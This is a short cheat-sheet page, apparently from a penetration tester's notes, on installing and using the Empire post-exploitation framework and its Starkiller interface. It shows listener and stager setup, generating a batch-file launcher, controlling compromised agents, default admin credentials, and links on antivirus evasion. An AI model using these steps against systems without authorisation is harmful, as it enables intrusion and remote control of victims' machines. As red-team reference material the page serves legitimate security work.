Github Email LinkedIn

Empire & Starkiller

Intro

Empire is a post-exploitation framework that includes a pure-PowerShell2.0 Windows agent, and a pure Python 2.6/2.7 Linux/OS X agent. It is the merge of the previous PowerShell Empire and Python EmPyre projects.

LogoGitHub - EmpireProject/Empire: Empire is a PowerShell and Python post-exploitation agent.GitHub

Installation

on kali and parrot:

apt install powershell-empire

other distro:

git clone https://github.com/EmpireProject/Empire.git

sudo ./setup/install.sh

# or use docker image:
docker pull empireproject/empire

Basic Usage

  • agents - Will allow you to jump to agents menu.

  • back & main – Will take you back to the main menu.

  • exit – Will exit from Empire.

  • help – Will display help menu as shown in the above image.

  • info – Will display information about the active listener.

  • kill – Will kill a particular listener.

  • launcher – Used to generate an initial launcher for a listener.

  • list – Will list all the active listeners.

  • usestager – Used to use a stager (we will see below what exactly is a stager).

  • uselistener – Used to start a listener module.

run empire server and client:

powershell-empire server
powershell-empire client

list/use listeners:

(Empire) > listeners
(Empire: listeners) > uselistener meterpreter
(Empire: listeners/meterpreter) > info

set listener options and start it:

(Empire: listeners/meterpreter) > set name meterp
(Empire: listeners/meterpreter) > set port 5555
(Empire: listeners/meterpreter) > execute

list/use stagers:

(Empire) > usestager
(Empire) > usestager windows/launcher_bat
(Empire: stager/windows/launcher_bat) > set Listener meterpreter
(Empire: stager/windows/launcher_bat) > execute
        [*] Stager output written out to: /tmp/launcher.bat

send the payload and wait for agents:

(Empire) > agents
(Empire: agents) >  list
(Empire: agents) > interact [agent id]

use post-exploitation modules:

(Empire: agents) > usemodule
(Empire: agents) > usemodule external/generate_agent
(Empire: external/generate_agent) > options
Empire: external/generate_agent) > set Listener http
(Empire: external/generate_agent) > set Language powershell
(Empire: external/generate_agent) > execute

Starkiller

Graphical interface for empire client:

install and run starkiller:

apt install starkiller
powershell-empire server
starkiller

default credentials:

username: empireadmin
 password: password123

In-Depth Usage

LogoBeginning Powershell Empire - The Attack in 10 steps
LogoEmpire 4.2 - BC SecurityBC Security
https://blogs.keysight.com/blogs/tech/nwvs.entry.html/2021/06/16/empire_c2_-_networki-C4rq.htmlblogs.keysight.com
LogoCustomizing C2-Frameworks for AV-Evasion | S3cur3Th1sSh1t
PreviousMetasploitNextCovenant

Last updated